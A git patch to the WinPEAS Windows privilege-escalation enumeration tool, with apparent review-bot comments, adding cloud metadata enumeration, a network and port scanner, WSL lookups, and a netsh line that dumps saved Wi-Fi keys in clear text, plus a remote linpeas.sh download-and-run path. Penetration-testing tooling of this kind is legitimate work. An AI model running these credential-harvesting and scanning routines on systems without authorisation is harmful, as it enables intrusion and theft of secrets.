From b43511972398f0cd8ebcea3b93bde0f26252d2c1 Mon Sep 17 00:00:00 2001 
From: Carlos Polop Date: Tue, 27 Aug 2024 22:08:48 +0200 Subject: [PATCH] WinPEASS Big Update --- LICENSE | 2 +- README.md | 3 - linPEAS/README.md | 2 - winPEAS/README.md | 2 - winPEAS/winPEASbat/README.md | 3 - winPEAS/winPEASbat/winPEAS.bat | 6 +- winPEAS/winPEASexe/README.md | 8 +- winPEAS/winPEASexe/Tests/SmokeTests.cs | 2 +- .../winPEAS/3rdParty/Watson/Watson.cs | 4 +- .../winPEAS/Checks/ApplicationsInfo.cs | 10 +- winPEAS/winPEASexe/winPEAS/Checks/Checks.cs | 118 ++- .../winPEASexe/winPEAS/Checks/CloudInfo.cs | 93 +++ .../winPEASexe/winPEAS/Checks/FileAnalysis.cs | 53 +- .../winPEASexe/winPEAS/Checks/FilesInfo.cs | 18 +- .../winPEASexe/winPEAS/Checks/ProcessInfo.cs | 9 +- .../winPEASexe/winPEAS/Checks/SystemInfo.cs | 3 +- .../winPEASexe/winPEAS/Helpers/Beaprint.cs | 10 +- winPEAS/winPEASexe/winPEAS/Helpers/MyUtils.cs | 45 ++ .../Helpers/Registry/RegistryHelper.cs | 34 + .../winPEAS/Info/ApplicationInfo/AutoRuns.cs | 43 +- .../winPEAS/Info/CloudInfo/AWSInfo.cs | 201 +++++ .../winPEAS/Info/CloudInfo/AzureInfo.cs | 88 ++ .../winPEAS/Info/CloudInfo/CloudInfoBase.cs | 77 ++ .../winPEAS/Info/CloudInfo/EndpointData.cs | 10 + .../winPEAS/Info/CloudInfo/GCPInfo.cs | 208 +++++ .../winPEAS/Info/FilesInfo/WSL/WSLHelper.cs | 136 ++++ .../NetworkInfo/NetworkScanner/NetPinger.cs | 56 ++ .../NetworkScanner/NetworkScanner.cs | 93 +++ .../NetworkScanner/NetworkUtils.cs | 221 ++++++ .../NetworkInfo/NetworkScanner/PortScanner.cs | 122 +++ .../Info/ProcessInfo/DefensiveProcesses.cs | 751 +++--------------- .../winPEAS/Info/SystemInfo/SystemInfo.cs | 4 +- .../Browsers/Firefox/Firefox.cs | 2 +- winPEAS/winPEASexe/winPEAS/winPEAS.csproj | 13 +- .../winPEASexe/winPEAS/winPEAS.csproj.user | 2 +- winPEAS/winPEASps1/README.md | 4 +- 36 files changed, 1727 insertions(+), 729 deletions(-) create mode 100644 winPEAS/winPEASexe/winPEAS/Checks/CloudInfo.cs create mode 100644 winPEAS/winPEASexe/winPEAS/Info/CloudInfo/AWSInfo.cs create mode 100644 
winPEAS/winPEASexe/winPEAS/Info/CloudInfo/AzureInfo.cs create mode 100644 winPEAS/winPEASexe/winPEAS/Info/CloudInfo/CloudInfoBase.cs create mode 100644 winPEAS/winPEASexe/winPEAS/Info/CloudInfo/EndpointData.cs create mode 100644 winPEAS/winPEASexe/winPEAS/Info/CloudInfo/GCPInfo.cs create mode 100644 winPEAS/winPEASexe/winPEAS/Info/FilesInfo/WSL/WSLHelper.cs create mode 100644 winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetPinger.cs create mode 100644 winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetworkScanner.cs create mode 100644 winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetworkUtils.cs create mode 100644 winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/PortScanner.cs diff --git a/LICENSE b/LICENSE index 78a5d1c..afa1236 100755 --- a/LICENSE +++ b/LICENSE @@ -1,7 +1,7 @@ COPYING -- Describes the terms under which peass-ng is distributed. A copy of the GNU General Public License (GPL) is appended to this file. -peass-ng is (C) 2006-2022 Carlos Polop Martin. +peass-ng is (C) 2019-2024 Carlos Polop Martin. This program is free software; you may redistribute and/or modify it under the terms of the GNU General Public License as published by the Free diff --git a/README.md b/README.md index c72e70b..47ac44c 100755 --- a/README.md +++ b/README.md @@ -38,6 +38,3 @@ If you want to **add something** and have **any cool idea** related to this proj All the scripts/binaries of the PEAS suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own machines and/or with the owner's permission. - - -By Polop(TM) diff --git a/linPEAS/README.md b/linPEAS/README.md index 298bfc3..7f202a0 100755 --- a/linPEAS/README.md +++ b/linPEAS/README.md 
@@ -233,5 +233,3 @@ If you find any issue, please report it using **[github issues](https://github.c All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission. - -By Polop(TM) diff --git a/winPEAS/README.md b/winPEAS/README.md index b0724fc..0407e78 100755 --- a/winPEAS/README.md +++ b/winPEAS/README.md @@ -23,5 +23,3 @@ Are you a PEASS fan? Get now our merch at **[PEASS Shop](https://teespring.com/s ## Advisory All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission. - -By Polop diff --git a/winPEAS/winPEASbat/README.md b/winPEAS/winPEASbat/README.md index 112fc0d..444a33c 100755 --- a/winPEAS/winPEASbat/README.md +++ b/winPEAS/winPEASbat/README.md @@ -132,6 +132,3 @@ This is the kind of outpuf that you have to look for when usnig the winPEAS.bat ## Advisory All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission. - - -By Polop(TM) diff --git a/winPEAS/winPEASbat/winPEAS.bat b/winPEAS/winPEASbat/winPEAS.bat index 0d43701..5478eea 100755 --- a/winPEAS/winPEASbat/winPEAS.bat +++ b/winPEAS/winPEASbat/winPEAS.bat 
@@ -4,7 +4,7 @@ COLOR 0F CALL :SetOnce REM :: WinPEAS - Windows local Privilege Escalation Awesome Script -REM :: Code by PEASS-ng; Re-Write by ThisLimn0 +REM :: Code by carlospolop; Re-Write by ThisLimn0 REM Registry scan of other drives besides REM /////true or false @@ -46,7 +46,7 @@ CALL :ColorLine " %E%32m(((((((((. ,%E%92m(############################(%E%32m CALL :ColorLine " %E%32m(((((((((/, %E%92m,####################(%E%32m/..((((((((((.%E%97m" CALL :ColorLine " %E%32m(((((((((/,. %E%92m,*//////*,.%E%32m ./(((((((((((.%E%97m" CALL :ColorLine " %E%32m(((((((((((((((((((((((((((/%E%97m" -ECHO. by github.com/PEASS-ng +ECHO. by carlospolop ECHO. ECHO. @@ -363,7 +363,7 @@ CALL :T_Progress 1 :WifiCreds CALL :ColorLine " %E%33m[+]%E%97m WIFI" -for /f "tokens=3,* delims=: " %%a in ('netsh wlan show profiles ^| find "Profile "') do (netsh wlan show profiles name=%%b key=clear | findstr "SSID Cipher Content" | find /v "Number" & ECHO.) +for /f "tokens=4 delims=: " %%a in ('netsh wlan show profiles ^| find "Profile "') do (netsh wlan show profiles name=%%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & ECHO.) CALL :T_Progress 1 :BasicUserInfo diff --git a/winPEAS/winPEASexe/README.md b/winPEAS/winPEASexe/README.md index e80f09e..5f54578 100755 --- a/winPEAS/winPEASexe/README.md +++ b/winPEAS/winPEASexe/README.md @@ -178,6 +178,11 @@ Once you have installed and activated it you need to: - [x] DNS Cache (limit 70) - [x] Internet Settings +- **Cloud Metadata Enumeration** + - [x] AWS Metadata + - [x] GCP Metadata + - [x] Azure Metadata + - **Windows Credentials** - [x] Windows Vault - [x] Credential Manager 
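Review bot: Switching to `tokens=4` truncates any profile name that contains a space: `netsh` prints `All User Profile : Home WiFi`, and with `delims=: ` token 4 is just `Home`, so the `key=clear` lookup on the next command fails for exactly those SSIDs. Keep the remainder token and quote it for netsh, e.g. `for /f "tokens=3,* delims=: " %%a in ('netsh wlan show profiles ^| find "Profile "') do (netsh wlan show profiles name="%%b" key=clear | findstr "SSID Cipher Content" | find /v "Number" & ECHO.)`. The removed line had the same gap (`name=%%b` unquoted), so neither version handled spaces. The `find "Profile "` filter also presumably matches only English netsh output, since netsh labels are localized; that deserves a REM on the line.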
@@ -256,6 +261,3 @@ If you find any issue, please report it using **[github issues](https://github.c ## Advisory All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission. - - -By Polop diff --git a/winPEAS/winPEASexe/Tests/SmokeTests.cs b/winPEAS/winPEASexe/Tests/SmokeTests.cs index 49525a3..9542bf8 100644 --- a/winPEAS/winPEASexe/Tests/SmokeTests.cs +++ b/winPEAS/winPEASexe/Tests/SmokeTests.cs @@ -12,7 +12,7 @@ namespace winPEAS.Tests try { string[] args = new string[] { - "systeminfo", "userinfo", "servicesinfo", "browserinfo", "eventsinfo", "debug" + "systeminfo", "userinfo", "servicesinfo", "browserinfo", "eventsinfo", "cloud", "debug" }; Program.Main(args); } diff --git a/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Watson.cs b/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Watson.cs index fbf64cc..307cf94 100644 --- a/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Watson.cs +++ b/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Watson.cs @@ -20,7 +20,7 @@ namespace winPEAS._3rdParty.Watson { { 10240, "1507" }, { 10586, "1511" }, { 14393, "1607" }, { 15063, "1703" }, { 16299, "1709" }, { 17134, "1803" }, { 17763, "1809" }, { 18362, "1903" }, { 18363, "1909" }, { 19041, "2004" }, - { 19042, "20H2" } + { 19042, "20H2" }, { 22000, "21H2" }, { 22621, "22H2" } }; // Get OS Build number @@ -30,7 +30,6 @@ namespace winPEAS._3rdParty.Watson if (!supportedVersions.ContainsKey(buildNumber)) { Console.Error.WriteLine($" [!] Windows version not supported, build number: '{buildNumber}'"); - return; } var version = supportedVersions[buildNumber]; @@ -39,7 +38,6 @@ namespace winPEAS._3rdParty.Watson else { Console.Error.WriteLine(" [!] Could not retrieve Windows BuildNumber"); - return; } // List of KBs installed 
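Review bot: The smoke test passes `"cloud"`, but the check registered in Checks.cs and listed in the help text is `cloudinfo`, so this token never selects the new CloudInfo check and the test exercises nothing cloud-related; change it to `"cloudinfo"`. Whatever the argument parser does with an unrecognised token is outside this hunk, so the test may keep passing while silently skipping the check it was meant to cover.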
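Review bot: Dropping the `return;` after the `supportedVersions.ContainsKey` failure means the very next statement, `var version = supportedVersions[buildNumber];`, throws `KeyNotFoundException` for any build absent from the table, and the table still lacks Windows 10 21H1/21H2/22H2 (19043/19044/19045) and Windows 11 23H2/24H2 (22631/26100), so this is the common path rather than an edge case. If the intent is to continue to the KB listing, replace the lookup with `if (!supportedVersions.TryGetValue(buildNumber, out var version)) { Console.Error.WriteLine($" [!] Windows version not supported, build number: '{buildNumber}'"); }` and make the version-dependent code conditional on that result; otherwise keep the `return`. The second removed `return;` (no build number at all) appears safe only because `version` is scoped inside the `if`; the rest of the method is outside the hunk.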
diff --git a/winPEAS/winPEASexe/winPEAS/Checks/ApplicationsInfo.cs b/winPEAS/winPEASexe/winPEAS/Checks/ApplicationsInfo.cs index 7e75254..fed1fe3 100644 --- a/winPEAS/winPEASexe/winPEAS/Checks/ApplicationsInfo.cs +++ b/winPEAS/winPEASexe/winPEAS/Checks/ApplicationsInfo.cs @@ -117,6 +117,7 @@ namespace winPEAS.Checks { (app["Folder"].Length > 0) ? app["Folder"].Replace("\\", "\\\\").Replace("(", "\\(").Replace(")", "\\)").Replace("]", "\\]").Replace("[", "\\[").Replace("?", "\\?").Replace("+","\\+") : "ouigyevb2uivydi2u3id2ddf3", !string.IsNullOrEmpty(app["interestingFolderRights"]) ? Beaprint.ansi_color_bad : Beaprint.ansi_color_good }, { (app["File"].Length > 0) ? app["File"].Replace("\\", "\\\\").Replace("(", "\\(").Replace(")", "\\)").Replace("]", "\\]").Replace("[", "\\[").Replace("?", "\\?").Replace("+","\\+") : "adu8v298hfubibuidiy2422r", !string.IsNullOrEmpty(app["interestingFileRights"]) ? Beaprint.ansi_color_bad : Beaprint.ansi_color_good }, { (app["Reg"].Length > 0) ? app["Reg"].Replace("\\", "\\\\").Replace("(", "\\(").Replace(")", "\\)").Replace("]", "\\]").Replace("[", "\\[").Replace("?", "\\?").Replace("+","\\+") : "o8a7eduia37ibduaunbf7a4g7ukdhk4ua", (app["RegPermissions"].Length > 0) ? Beaprint.ansi_color_bad : Beaprint.ansi_color_good }, + { "Potentially sensitive file content:", Beaprint.ansi_color_bad }, }; string line = ""; @@ -158,9 +159,9 @@ namespace winPEAS.Checks line += "\n File: " + filepath_mod; } - if (app["isUnquotedSpaced"].ToLower() == "true") + if (app["isUnquotedSpaced"].ToLower() != "false") { - line += " (Unquoted and Space detected)"; + line += $" (Unquoted and Space detected) - {app["isUnquotedSpaced"]}"; } if (!string.IsNullOrEmpty(app["interestingFileRights"])) 
@@ -168,6 +169,11 @@ namespace winPEAS.Checks line += "\n FilePerms: " + app["interestingFileRights"]; } + if (app.ContainsKey("sensitiveInfoList") && !string.IsNullOrEmpty(app["sensitiveInfoList"])) + { + line += "\n Potentially sensitive file content: " + app["sensitiveInfoList"]; + } + Beaprint.AnsiPrint(line, colorsA); Beaprint.PrintLineSeparator(); } diff --git a/winPEAS/winPEASexe/winPEAS/Checks/Checks.cs b/winPEAS/winPEASexe/winPEAS/Checks/Checks.cs index 17e7e7e..45e67d4 100644 --- a/winPEAS/winPEASexe/winPEAS/Checks/Checks.cs +++ b/winPEAS/winPEASexe/winPEAS/Checks/Checks.cs @@ -3,12 +3,14 @@ using System.Collections.Generic; using System.IO; using System.Linq; using System.Management; +using System.Net; using System.Security.Principal; using winPEAS.Helpers; using winPEAS.Helpers.AppLocker; using winPEAS.Helpers.Registry; using winPEAS.Helpers.Search; using winPEAS.Helpers.YamlConfig; +using winPEAS.Info.NetworkInfo.NetworkScanner; using winPEAS.Info.UserInfo; namespace winPEAS.Checks @@ -21,8 +23,12 @@ namespace winPEAS.Checks public static bool IsDebug = false; public static bool IsLinpeas = false; public static bool IsLolbas = false; + public static bool IsNetworkScan = false; public static bool SearchProgramFiles = false; + private static IEnumerable PortScannerPorts = null; + private static string NetworkScanOptions = string.Empty; + // Create Dynamic blacklists public static readonly string CurrentUserName = Environment.UserName; public static string CurrentUserDomainName = Environment.UserDomainName; @@ -47,7 +53,7 @@ namespace winPEAS.Checks private static readonly HashSet _systemCheckSelectedKeysHashSet = new HashSet(); // github url for Linpeas.sh - public static string LinpeasUrl = "https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh"; + public static string LinpeasUrl = "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh"; public const string DefaultLogFile = "out.txt"; 
@@ -87,7 +93,8 @@ namespace winPEAS.Checks new SystemCheck("windowscreds", new WindowsCreds()), new SystemCheck("browserinfo", new BrowserInfo()), new SystemCheck("filesinfo", new FilesInfo()), - new SystemCheck("fileanalysis", new FileAnalysis()) + new SystemCheck("fileanalysis", new FileAnalysis()), + new SystemCheck("cloudinfo", new CloudInfo()) }; var systemCheckAllKeys = new HashSet(_systemChecks.Select(i => i.Key)); @@ -199,6 +206,52 @@ namespace winPEAS.Checks } } + if (arg.StartsWith("-network", StringComparison.CurrentCultureIgnoreCase)) + { + /* + -network="auto" - find interfaces/hosts automatically + -network="10.10.10.10,10.10.10.20" - scan only selected ip address(es) + -network="10.10.10.10/24" - scan host based on ip address/netmask + */ + if (!IsNetworkTypeValid(arg)) + { + Beaprint.ColorPrint($" [!] the \"-network\" argument is invalid. For help, run winpeass.exe --help", Beaprint.YELLOW); + + return; + } + + var parts = arg.Split('='); + string networkType = parts[1]; + + IsNetworkScan = true; + NetworkScanOptions = networkType; + } + + if (arg.StartsWith("-ports", StringComparison.CurrentCultureIgnoreCase)) + { + // e.g. -ports="80,443,8080" + var parts = arg.Split('='); + if (!IsNetworkScan || parts.Length != 2 || string.IsNullOrEmpty(parts[1])) + { + Beaprint.ColorPrint($" [!] the \"-network\" argument is not present or valid, add it if you want to define network scan ports. For help, run winpeass.exe --help", Beaprint.YELLOW); + + return; + } + + var portString = parts[1]; + IEnumerable ports = new List(); + try + { + PortScannerPorts = portString.Trim('"').Trim('\'').Split(',').ToList().ConvertAll(int.Parse); + } + catch (Exception) + { + Beaprint.ColorPrint($" [!] the \"-ports\" argument is not present or valid, add it if you want to define network scan ports. For help, run winpeass.exe --help", Beaprint.YELLOW); + + return; + } + } + string argToLower = arg.ToLower(); if (systemCheckAllKeys.Contains(argToLower)) { 
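Review bot: The `-ports` branch is order-dependent: it is rejected whenever `-network` has not been parsed yet, so `winpeas.exe -ports="80,443" -network=auto` fails with a message claiming `-network` is missing; parse the list unconditionally and check the pairing once after the argument loop (which starts before this hunk). The parsed values also get no range check, `int.Parse` happily yields `0`, `-1` or `70000` and they go straight into `PortScannerPorts`; add `if (PortScannerPorts.Any(p => p < 1 || p > 65535)) { Beaprint.ColorPrint(" [!] -ports values must be in 1-65535", Beaprint.YELLOW); return; }` after the parse. Finally the `-network` value is stored without the `Trim('"').Trim('\'')` that `-ports` applies, so the two flags treat quoted values differently.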
@@ -237,7 +290,7 @@ namespace winPEAS.Checks CheckRunner.Run(() => CreateDynamicLists(isFileSearchEnabled), IsDebug); - RunChecks(isAllChecks, wait); + RunChecks(isAllChecks, wait, IsNetworkScan); SearchHelper.CleanLists(); @@ -258,7 +311,58 @@ namespace winPEAS.Checks } } - private static void RunChecks(bool isAllChecks, bool wait) + private static bool IsNetworkTypeValid(string arg) + { + var parts = arg.Split('='); + string networkType = string.Empty; + + if (parts.Length == 2 && !string.IsNullOrEmpty(parts[1])) + { + networkType = parts[1]; + + // auto + if (string.Equals(networkType, "auto", StringComparison.InvariantCultureIgnoreCase)) + { + return true; + } + + // netmask e.g. 10.10.10.10/24 + else if (networkType.Contains("/")) + { + var rangeParts = networkType.Split('/'); + + if (rangeParts.Length == 2 && int.TryParse(rangeParts[1], out int res) && res <= 32 && res >= 0) + { + return true; + } + } + // list of ip addresses + else if (networkType.Contains(",")) + { + var ips = networkType.Split(','); + + try + { + var validIpsCount = ips.ToList().ConvertAll(IPAddress.Parse).Count(); + } + catch (Exception) + { + return false; + } + + return true; + } + // single ip + else if (IPAddress.TryParse(networkType, out _)) + { + return true; + } + } + + return false; + } + + private static void RunChecks(bool isAllChecks, bool wait, bool isNetworkScan) { for (int i = 0; i < _systemChecks.Count; i++) { @@ -274,6 +378,12 @@ namespace winPEAS.Checks } } } + + if (isNetworkScan) + { + NetworkScanner scanner = new NetworkScanner(NetworkScanOptions, PortScannerPorts); + scanner.Scan(); + } } private static void CreateDynamicLists(bool isFileSearchEnabled) diff --git a/winPEAS/winPEASexe/winPEAS/Checks/CloudInfo.cs b/winPEAS/winPEASexe/winPEAS/Checks/CloudInfo.cs new file mode 100644 index 0000000..bf1dc37 --- /dev/null +++ b/winPEAS/winPEASexe/winPEAS/Checks/CloudInfo.cs 
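Review bot: The CIDR branch of `IsNetworkTypeValid` validates only the prefix length: `rangeParts[0]` is never parsed, so `-network=foo/24` is accepted and reaches `NetworkScanner` unchecked, and `res >= 0` admits `/0`, i.e. the whole IPv4 space as a scan target. Tighten it to `if (rangeParts.Length == 2 && IPAddress.TryParse(rangeParts[0], out _) && int.TryParse(rangeParts[1], out int res) && res >= 0 && res <= 32)` and consider a sane lower bound on the prefix given the traffic a /8 would generate. `validIpsCount` in the list branch is assigned and never read; `ips.All(ip => IPAddress.TryParse(ip, out _))` expresses the same check without the exception. `IPAddress.Parse` also accepts IPv6 literals, which the scanner may not expect; NetworkScanner.cs is not in this chunk.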
@@ -0,0 +1,93 @@
+using System.Collections.Generic;
+using winPEAS.Helpers;
+using winPEAS.Info.CloudInfo;
+
+namespace winPEAS.Checks
+{
+ internal class CloudInfo : ISystemCheck
+ {
+ public void PrintInfo(bool isDebug)
+ {
+ Beaprint.GreatPrint("Cloud Information");
+
+ var cloudInfoList = new List
+ {
+ new AWSInfo(),
+ new AzureInfo(),
+ new GCPInfo()
+ };
+
+ foreach (var cloudInfo in cloudInfoList)
+ {
+ string isCloud = cloudInfo.IsCloud ? "Yes" : "No";
+ string line = string.Format($"{cloudInfo.Name + "?",-40}{isCloud,-5}");
+
+ Dictionary colorsMS = new Dictionary()
+ {
+ { "Yes", Beaprint.ansi_color_bad },
+ };
+ Beaprint.AnsiPrint(line, colorsMS);
+ }
+
+ foreach (var cloudInfo in cloudInfoList)
+ {
+ if (cloudInfo.IsCloud)
+ {
+ Beaprint.MainPrint(cloudInfo.Name + " Enumeration");
+
+ if (cloudInfo.IsAvailable)
+ {
+ foreach (var kvp in cloudInfo.EndpointDataList())
+ {
+ // key = "section", e.g. User, Network, ...
+ string section = kvp.Key;
+ var endpointDataList = kvp.Value;
+
+ Beaprint.ColorPrint(section, Beaprint.ansi_color_good);
+
+ foreach (var endpointData in endpointDataList)
+ {
+ var colors = new Dictionary
+ {
+ { endpointData.EndpointName, Beaprint.GRAY }
+ };
+
+ string message;
+ if (!string.IsNullOrEmpty(endpointData.Data))
+ {
+ message = endpointData.Data;
+ // if it is a JSON data, add additional newline so it's displayed on a separate line
+ if (message.StartsWith("{"))
+ {
+ message = $"\n{message}\n";
+ }
+
+ if (endpointData.IsAttackVector)
+ {
+ colors.Add(message, Beaprint.ansi_color_bad);
+ }
+ else
+ {
+ colors.Add(message, Beaprint.ansi_color_gray);
+ }
+ }
+ else
+ {
+ message = "No data received from the metadata endpoint";
+ }
+
+ Beaprint.ColorPrint($"{endpointData.EndpointName,-30}{message}", Beaprint.ansi_color_gray);
+ }
+
+ Beaprint.GrayPrint("");
+ }
+ }
+ else
+ {
+ Beaprint.NoColorPrint("Could not connect to the metadata endpoint");
+ }
+ }
+ }
+ }
+}
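Review bot: The `colors` dictionary in the inner loop, including the `IsAttackVector` branch that assigns `ansi_color_bad`, is built and then never used: the only print is `Beaprint.ColorPrint(..., Beaprint.ansi_color_gray)`, so endpoints flagged as attack vectors are rendered exactly like the rest and the highlighting this block exists for is dead code. Drop the dictionary and pick the colour at the print site, `Beaprint.ColorPrint($"{endpointData.EndpointName,-30}{message}", endpointData.IsAttackVector ? Beaprint.ansi_color_bad : Beaprint.ansi_color_gray);`. `string.Format($"...")` formats an already-interpolated string a second time and would throw `FormatException` if a provider name ever contained a brace; `string line = $"{cloudInfo.Name + "?",-40}{isCloud,-5}";` is enough. Worth a comment at the top of `PrintInfo`: whatever the metadata endpoints return (credentials, user-data) is printed verbatim and lands in the output log, so that log has to be handled as a secret.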
diff --git a/winPEAS/winPEASexe/winPEAS/Checks/FileAnalysis.cs b/winPEAS/winPEASexe/winPEAS/Checks/FileAnalysis.cs index 3da86fd..b440757 100644 --- a/winPEAS/winPEASexe/winPEAS/Checks/FileAnalysis.cs +++ b/winPEAS/winPEASexe/winPEAS/Checks/FileAnalysis.cs @@ -1,4 +1,4 @@ -using System; +using System; using System.Collections.Generic; using System.Diagnostics; using System.IO; @@ -97,9 +97,19 @@ namespace winPEAS.Checks else { foreach (var fold in file.FullPath.Split('\\').Skip(1)) - { - isFileFound = Regex.IsMatch(fold, pattern, RegexOptions.IgnoreCase); - if (isFileFound) break; + { + try + { + isFileFound = Regex.IsMatch(fold, pattern, RegexOptions.IgnoreCase, TimeSpan.FromSeconds(20)); + if (isFileFound) break; + } + catch (RegexMatchTimeoutException e) + { + if (Checks.IsDebug) + { + Beaprint.GrayPrint($"The file in folder regex {pattern} had a timeout in {fold} (ReDoS avoided but regex unchecked in a file)"); + } + } } } } @@ -111,7 +121,17 @@ namespace winPEAS.Checks } else { - isFileFound = Regex.IsMatch(file.Filename, pattern, RegexOptions.IgnoreCase); + try + { + isFileFound = Regex.IsMatch(file.Filename, pattern, RegexOptions.IgnoreCase, TimeSpan.FromSeconds(20)); + } + catch (RegexMatchTimeoutException e) + { + if (Checks.IsDebug) + { + Beaprint.GrayPrint($"The file regex {pattern} had a timeout in {file.Filename} (ReDoS avoided but regex unchecked in a file)"); + } + } } } @@ -148,7 +168,7 @@ namespace winPEAS.Checks return new bool[] { false, somethingFound }; } - private static List SearchContent(string text, string regex_str, bool caseinsensitive) + public static List SearchContent(string text, string regex_str, bool caseinsensitive) { List foundMatches = new List(); 
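Review bot: Both new `catch (RegexMatchTimeoutException e)` blocks declare `e` and never use it (CS0168); write `catch (RegexMatchTimeoutException)`. The 20-second budget is also applied per path component per pattern, so one hostile-looking directory name can stall the walk for 20 s times the number of patterns before anything is reported; a budget of a second or two is ample for matching a single filename and keeps the ReDoS guard without the stall. The enclosing method starts before this hunk.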
@@ -157,17 +177,20 @@ namespace winPEAS.Checks Regex rgx; bool is_re_match = false; try - { + { + // Escape backslashes in the regex string + string escapedRegex = regex_str.Trim().Replace(@"\", @"\\"); + // Use "IsMatch" because it supports timeout, if exception is thrown exit the func to avoid ReDoS in "rgx.Matches" if (caseinsensitive) { - is_re_match = Regex.IsMatch(text, regex_str.Trim(), RegexOptions.IgnoreCase, TimeSpan.FromSeconds(120)); - rgx = new Regex(regex_str.Trim(), RegexOptions.IgnoreCase); + is_re_match = Regex.IsMatch(text, escapedRegex, RegexOptions.IgnoreCase, TimeSpan.FromSeconds(120)); + rgx = new Regex(escapedRegex, RegexOptions.IgnoreCase); } else { - is_re_match = Regex.IsMatch(text, regex_str.Trim(), RegexOptions.None, TimeSpan.FromSeconds(120)); - rgx = new Regex(regex_str.Trim()); + is_re_match = Regex.IsMatch(text, escapedRegex, RegexOptions.None, TimeSpan.FromSeconds(120)); + rgx = new Regex(escapedRegex); } } catch (RegexMatchTimeoutException e) @@ -200,8 +223,6 @@ namespace winPEAS.Checks Beaprint.GrayPrint($"Error looking for regex {regex_str} inside files: {e}"); } - //} - return foundMatches; } @@ -444,7 +465,7 @@ namespace winPEAS.Checks foundRegexes[regex_obj.name][regex.name] = fileResults; } } - catch (Exception ex) + catch (System.IO.IOException) { // Cannot read the file } @@ -454,8 +475,8 @@ namespace winPEAS.Checks timer.Stop(); TimeSpan timeTaken = timer.Elapsed; - if (timeTaken.TotalMilliseconds > 20000) - Beaprint.PrintDebugLine($"\nThe regex {regex.regex} took {timeTaken.TotalMilliseconds}s in {f.FullPath}"); + if (timeTaken.TotalMilliseconds > 10000) + Beaprint.PrintDebugLine($"\nThe regex {regex.regex} took {timeTaken.TotalMilliseconds}ms in {f.FullPath}"); } } } diff --git a/winPEAS/winPEASexe/winPEAS/Checks/FilesInfo.cs b/winPEAS/winPEASexe/winPEAS/Checks/FilesInfo.cs index 2513936..b6974f9 100644 --- a/winPEAS/winPEASexe/winPEAS/Checks/FilesInfo.cs +++ b/winPEAS/winPEASexe/winPEAS/Checks/FilesInfo.cs 
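Review bot: `regex_str.Trim().Replace(@"\", @"\\")` turns every escape in the configured patterns into a literal backslash: `\s`, `\d`, `\w`, `\.` become `\\s`, `\\d`, `\\w`, `\\.`, which only match a backslash followed by that character, so any YAML rule that relies on an escape silently stops matching. If the goal was to let config authors write Windows paths unescaped, that belongs in the YAML (or `Regex.Escape` applied only to values declared literal), not blanket-applied to every regex; revert to `regex_str.Trim()`. Separately, the `rgx` instance built on the next lines has no match timeout, so the `rgx.Matches` call the comment refers to is still unbounded even though `IsMatch` (which stops at the first hit) passed; construct it as `rgx = new Regex(escapedRegex, RegexOptions.IgnoreCase, TimeSpan.FromSeconds(120));` and catch `RegexMatchTimeoutException` around `Matches`. The rest of `SearchContent` is outside the hunk.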
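Review bot: Narrowing `catch (Exception ex)` to `catch (System.IO.IOException)` lets `UnauthorizedAccessException` escape; it derives from `SystemException`, not `IOException`, and is exactly what reading an ACL-protected file throws, so the first file the current user may not read now propagates out of this `try` instead of being skipped (what catches it further up is outside the hunk). Keep both with an exception filter, `catch (Exception ex) when (ex is IOException || ex is UnauthorizedAccessException)`, and print the path under `Beaprint.PrintDebugLine` so skipped files are visible in `debug` runs rather than silently dropped.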
@@ -290,15 +290,13 @@ namespace winPEAS.Checks const string distribution = "Distribution"; const string rootDirectory = "Root directory"; const string runWith = "Run command"; + const string wslUser = "WSL user"; + const string root = "root"; + var colors = new Dictionary(); - new List - { - linpeas, - distribution, - rootDirectory, - runWith - }.ForEach(str => colors.Add(str, Beaprint.ansi_color_bad)); + new List { linpeas, distribution, rootDirectory, runWith, wslUser, root } + .ForEach(str => colors.Add(str, Beaprint.ansi_color_bad)); Beaprint.BadPrint(" Found installed WSL distribution(s) - listed below"); Beaprint.AnsiPrint($" Run {linpeas} in your WSL distribution(s) home folder(s).\n", colors); @@ -310,14 +308,16 @@ namespace winPEAS.Checks string distributionSubKey = $"{basePath}\\{wslKey}"; string distributionRootDirectory = $"{RegistryHelper.GetRegValue(hive, distributionSubKey, "BasePath")}\\rootfs"; string distributionName = RegistryHelper.GetRegValue(hive, distributionSubKey, "DistributionName"); + string user = WSLHelper.TryGetRootUser(distributionName, wslKey); Beaprint.AnsiPrint($" {distribution}: \"{distributionName}\"\n" + + $" {wslUser}: \"{user}\"\n" + $" {rootDirectory}: \"{distributionRootDirectory}\"\n" + $" {runWith}: wsl.exe --distribution \"{distributionName}\"", colors); Beaprint.PrintLineSeparator(); } - catch (Exception) { } + catch (Exception ex) { } } // try to run linpeas.sh in the default distribution @@ -328,7 +328,7 @@ namespace winPEAS.Checks { try { - WSL.RunLinpeas(Checks.LinpeasUrl); + WSLHelper.RunLinpeas(Checks.LinpeasUrl); } catch (Exception ex) { diff --git a/winPEAS/winPEASexe/winPEAS/Checks/ProcessInfo.cs b/winPEAS/winPEASexe/winPEAS/Checks/ProcessInfo.cs index d1a6b14..a6d4ced 100644 --- a/winPEAS/winPEASexe/winPEAS/Checks/ProcessInfo.cs +++ b/winPEAS/winPEASexe/winPEAS/Checks/ProcessInfo.cs 
